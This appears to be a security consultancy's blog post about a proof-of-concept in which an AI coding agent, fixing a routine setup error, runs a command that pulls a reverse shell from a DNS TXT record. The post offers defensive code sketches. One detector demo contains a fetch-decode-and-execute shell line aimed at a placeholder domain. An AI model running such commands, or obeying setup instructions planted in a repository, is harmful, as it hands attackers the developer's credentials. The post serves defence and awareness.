
AI Coding Agents Tricked Into Running Hidden Malware


By Yonatan Hoorizadeh — CISSP, CISM, CRISC, AAISM

Published By: Purple Shield Security

Published: June 29, 2026

Last updated: June 29, 2026


Security researchers at 0DIN showed that an AI coding agent can be tricked into running hidden malware from a GitHub repository that contains no malicious code. The payload is fetched at runtime from a DNS record, so scanners, human reviewers, and the agent itself never see it. The agent runs it while trying to fix a routine setup error.


A working reverse shell appeared on a developer's machine after an AI assistant was asked to do one ordinary thing: get a freshly cloned project running. No exploit code sat in the repository. No alarming command was approved. The agent read the setup notes, hit an error, ran the documented fix, and that fix quietly opened a connection back to an attacker's server. That is the uncomfortable part of this finding — nothing about it looks like an attack until it already is one.


What did researchers actually find?


Researchers at 0DIN, Mozilla's Zero Day Investigative Network, demonstrated that an agentic coding tool can be steered into executing a malicious payload that never appears in the repository it cloned. The proof-of-concept used Anthropic's Claude Code, and the researchers stressed there was "no exploit code, no warning, no suspicious command anyone had to approve." The repository passes review because every file in it is genuinely harmless.


An agentic coding tool is an AI assistant that doesn't just suggest code — it clones repositories, runs setup commands, installs dependencies, and fixes errors on its own. That autonomy is the selling point. It is also, as this research shows, the attack surface. The work is currently a proof-of-concept, not an attack seen in the wild, but BleepingComputer reported that 0DIN warns the same repositories could be seeded through fake job postings, tutorials, blog posts, or direct messages.


Why does a clean repo matter to a business?


It matters because every defense most companies rely on for software supply-chain risk assumes the malicious code exists somewhere it can be found. Here, there is nothing to find. The repository is clean to static scanners, clean to human reviewers, and clean to the AI agent reading it. The malicious instruction exists only for the few seconds in which it is pulled from an external source and run.


If the attack succeeds, the attacker gets an interactive shell running with the developer's own privileges. According to the 0DIN research, that means access to environment variables, API keys, local configuration files, and a foothold to establish persistence. For most small and mid-market firms, a developer laptop is not a sandbox: it holds cloud credentials, production access, and paths to customer data. One compromised setup step can become a direct line into your cloud environment.


This is squarely an AI security problem, not a traditional malware problem. The vulnerability isn't a bug in a product you can patch. It is the unconditional trust an autonomous agent places in setup instructions and error messages it was never designed to question.


How does the attack work without any malicious code?


The attack chains three steps that are each harmless on their own. The repository ships with normal-looking setup instructions. A Python package is built to fail on first run, producing an error that tells the user — or the agent — to run an initialization command. That command quietly pulls a value from an attacker-controlled DNS TXT record and executes it. The decoded value is a reverse shell.
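To make the fetch-then-execute pattern concrete, here is a minimal sketch of a heuristic that inspects the text of a setup command or script. It is illustrative only and is not 0DIN's tooling: the pattern lists, the function name flag_fetch_then_execute, and the domain init.example.com are all assumptions, and a check like this is easy to evade. It also sees only the text it is given, so a lookup buried inside an installed package would still pass.

```python
import re

# Hypothetical heuristics: tools that pull data from the network at runtime.
FETCH_PATTERNS = {
    "dns_txt_lookup": re.compile(r"\b(dig|nslookup|host)\b[^|;&]*\btxt\b", re.IGNORECASE),
    "http_download": re.compile(r"\b(curl|wget)\b", re.IGNORECASE),
}

# Hypothetical heuristics: ways fetched text ends up being executed.
EXEC_PATTERNS = {
    "pipe_to_interpreter": re.compile(r"\|\s*(sudo\s+)?(sh|bash|zsh|python3?)\b"),
    "eval_or_substitution": re.compile(r"\beval\b|\$\(|`"),
    "base64_decode": re.compile(r"\bbase64\b\s+(-d|--decode)\b"),
}


def flag_fetch_then_execute(command: str) -> list[str]:
    """Return matched pattern names if the text both fetches and executes, else []."""
    fetches = [name for name, rx in FETCH_PATTERNS.items() if rx.search(command)]
    execs = [name for name, rx in EXEC_PATTERNS.items() if rx.search(command)]
    # A fetch alone or an exec alone is ordinary; the combination is what gets flagged.
    if fetches and execs:
        return fetches + execs
    return []


if __name__ == "__main__":
    # init.example.com is a placeholder domain, not one from the research.
    print(flag_fetch_then_execute("dig +short TXT init.example.com | base64 -d | sh"))
    print(flag_fetch_then_execute("pip install -r requirements.txt"))
```

Note that a bare `dig +short TXT init.example.com` produces no flag in this sketch. The lookup looks ordinary until it is paired with execution, which is the property the attack relies on.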


The reason conventional defenses miss it comes down to where each piece lives. As the 0DIN researchers put it: "Claude Code never decided to open a shell. It decided to fix an error." The malicious instruction is split across the repository, the DNS infrastructure, and the developer's trust in their AI agent — three systems that are never examined together. A static scanner sees an ordinary DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None looks malicious alone.


The technique is a form of indirect prompt injection — where untrusted content an AI agent reads (a repo, documentation, an error message) carries instructions the agent then acts on. Once an agent is authorized to run shell commands, that injected instruction can reach everything the developer can reach.


Who is exposed, and how would a vCISO triage this?


Any team that lets AI coding agents clone and run untrusted repositories is exposed — which increasingly means most software, data, and product teams. The first move isn't a tool purchase. It is finding out where these agents are already running, what they're allowed to do, and whose credentials they inherit. That visibility is exactly what experienced security leadership produces, and it is where vCISO services earn their place.


In the first 24 to 72 hours, a security leader would treat any AI agent that clones external repos and runs setup code as an arbitrary-code-execution path, because that is what it is. That means identifying which agents are in use, confirming they don't run with standing access to production secrets, and putting untrusted repositories behind a sandbox or a container with no live credentials. The goal is to shrink the blast radius before the technique moves from proof-of-concept to commodity.
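As a small illustration of "no live credentials," the sketch below runs a setup command with a copy of the environment that has secret-looking variables removed. The naming patterns, prefixes, and function names are assumptions for illustration, not a vetted list. This reduces exposure through environment variables only. It does not stop a process from reading credential files on disk or from reaching the network, so it complements a sandbox or container rather than replacing one.

```python
import os
import re
import subprocess

# Assumed naming conventions for secret-bearing variables; adjust to your environment.
SECRET_NAME = re.compile(r"(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL)", re.IGNORECASE)
SECRET_PREFIXES = ("AWS_", "AZURE_", "GOOGLE_", "GITHUB_")


def scrub_environment(env: dict[str, str]) -> dict[str, str]:
    """Return a copy of env without variables that look like credentials."""
    return {
        name: value
        for name, value in env.items()
        if not SECRET_NAME.search(name)
        and not name.upper().startswith(SECRET_PREFIXES)
    }


def run_setup_without_secrets(command: list[str], cwd: str) -> subprocess.CompletedProcess:
    """Run a setup command with a scrubbed copy of the current environment."""
    return subprocess.run(
        command,
        cwd=cwd,
        env=scrub_environment(dict(os.environ)),  # child never sees the removed variables
        capture_output=True,
        text=True,
        timeout=300,
        check=False,
    )
```

A deny-by-pattern filter like this will miss secrets stored under unusual names. Where the setup step is known in advance, passing an explicit allowlist of variables is the stricter choice.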


For a mid-market company without a full-time security executive, this is the gap fractional CISO services are built to close. Most firms adopting AI development tools have moved faster on capability than on governance — there is no policy for what an agent may touch, no inventory of which tools are running, and no owner for the decision. A part-time CISO supplies that ownership without the cost of a full-time hire, and Purple Shield works with firms in exactly that position.


What should your business do?


Start by treating AI coding agents as privileged software that runs code, because they do. The 0DIN researchers recommend that agents disclose the full execution chain of any setup command — including scripts and anything fetched at runtime — before running it. Until tools do that by default, the responsibility sits with you.
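To show what disclosing an execution chain could look like in its simplest form, the sketch below lists the repository files a setup command refers to and follows script-to-script references. It is an assumption-laden illustration, not how any particular agent works: the function name execution_chain and the token-matching approach are hypothetical. It also cannot see code inside installed packages or anything fetched at runtime, which is precisely the gap the researchers want tools to close.

```python
import shlex
from pathlib import Path


def execution_chain(command: str, repo_root: Path, max_depth: int = 5) -> list[str]:
    """List repo files a setup command refers to, following nested references.

    Illustrative only: tokens are matched against files in the repository, so
    runtime-fetched content and installed package code are invisible to it.
    """
    root = repo_root.resolve()
    chain: list[str] = []
    seen: set[Path] = set()

    def visit(text: str, depth: int) -> None:
        if depth > max_depth:
            return
        for line in text.splitlines():
            try:
                tokens = shlex.split(line, comments=True)
            except ValueError:
                tokens = line.split()  # unbalanced quotes: fall back to a plain split
            for token in tokens:
                try:
                    candidate = (root / token).resolve()
                    # Only follow regular files that stay inside the repository.
                    in_repo = candidate.is_file() and candidate.is_relative_to(root)
                except (OSError, ValueError):
                    continue
                if not in_repo or candidate in seen:
                    continue
                seen.add(candidate)
                chain.append(str(candidate.relative_to(root)))
                visit(candidate.read_text(errors="replace"), depth + 1)

    visit(command, 0)
    return chain
```

For a repository where `setup.sh` calls `tools/init.py`, calling `execution_chain("bash setup.sh", repo_root)` would list both files so a reviewer can read them before anything runs.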


Concrete steps worth taking now:

  • Inventory which AI coding agents are in use across your teams, including unsanctioned ones individual developers installed on their own.

  • Run untrusted or unfamiliar repositories inside a sandbox or disposable container that holds no live API keys, cloud tokens, or production credentials.

  • Scope agent permissions to least privilege, so an agent fixing a setup error cannot reach secrets it never needed.

  • Treat setup instructions and scripts in unfamiliar repos as untrusted code, regardless of what the AI tool recommends doing with them.

  • Assign a clear owner for the question: who decides what our AI agents are allowed to touch? If no one can answer, that is the gap to close first.
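The least-privilege and ownership steps above can be sketched as a tiny policy check that decides whether a command an agent proposes may run without a human looking at it. Everything here is hypothetical: the allowlist contents, the operator list, and the decide function are assumptions for illustration, and real agent tools expose their own permission settings. Allowlisting by program name is also coarse, since even an allowed program can be made to run other code.

```python
import shlex

# Hypothetical policy values; a real policy comes from whoever owns the decision.
ALLOWED = frozenset({"git", "ls", "cat"})
# Operators that can chain, substitute, or redirect, and so hide a second program.
SHELL_OPERATORS = ("|", ";", "&", "$(", "`", ">", "<", "\n")


def decide(command: str, allowed: frozenset[str] = ALLOWED) -> str:
    """Return "allow" or "ask" for a command an agent proposes to run."""
    # Never auto-approve anything that could contain more than one command.
    if any(op in command for op in SHELL_OPERATORS):
        return "ask"
    try:
        tokens = shlex.split(command)
    except ValueError:
        return "ask"  # unparseable input goes to a human
    if not tokens:
        return "ask"
    # Require a bare program name so "/tmp/git" cannot pose as "git".
    return "allow" if tokens[0] in allowed else "ask"


if __name__ == "__main__":
    for cmd in ("git status", "python -m pkg init", "ls | sh"):
        print(cmd, "->", decide(cmd))
```

The default is to ask, so anything the policy owner has not explicitly approved, including a package's "initialization" command, stops for review instead of running silently.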


None of this requires halting AI adoption. It requires governing it deliberately instead of trusting that the agent is checking for security on your behalf. It is not.


Frequently asked questions


Is this attack happening in the wild right now?

Not as of late June 2026. 0DIN's work is a proof-of-concept; there are no confirmed in-the-wild exploits, and there is no official patch. But the researchers warned that attackers could distribute these repositories through fake job postings, tutorials, and direct messages, so the window between concept and real-world use is the time to prepare.


Does this only affect Claude Code?

No. The demonstration used Claude Code, but the weakness is structural to agentic coding tools in general — any AI agent authorized to clone repos and run setup commands automatically. The issue is the trust model, not one vendor's product. Treat every coding agent with these permissions the same way.


Will antivirus or code scanning catch this?

No, and that is the point. The repository contains no malicious code, so static scanners and human review find nothing. The payload is fetched from a DNS TXT record at runtime and never stored in a file. Detection has to focus on agent behavior and least-privilege containment, not file scanning.


We're a small company without a CISO. Where do we start?

Start with visibility: list which AI coding tools your team uses and what credentials those tools can reach. If no one owns that question, a fractional CISO can stand up the inventory, set agent permission policy, and define a sandboxing standard within weeks, without first building a full security program from scratch.


AI development tools are moving into companies faster than the governance around them. If you want a second set of eyes on what your AI agents can touch — and who is accountable for that decision — Purple Shield's AI security and vCISO work is built for exactly this. As a vendor-neutral advisory firm, we help you adopt AI tools safely without selling you the tools. That is a conversation worth having before the next proof-of-concept becomes a real one.

 
 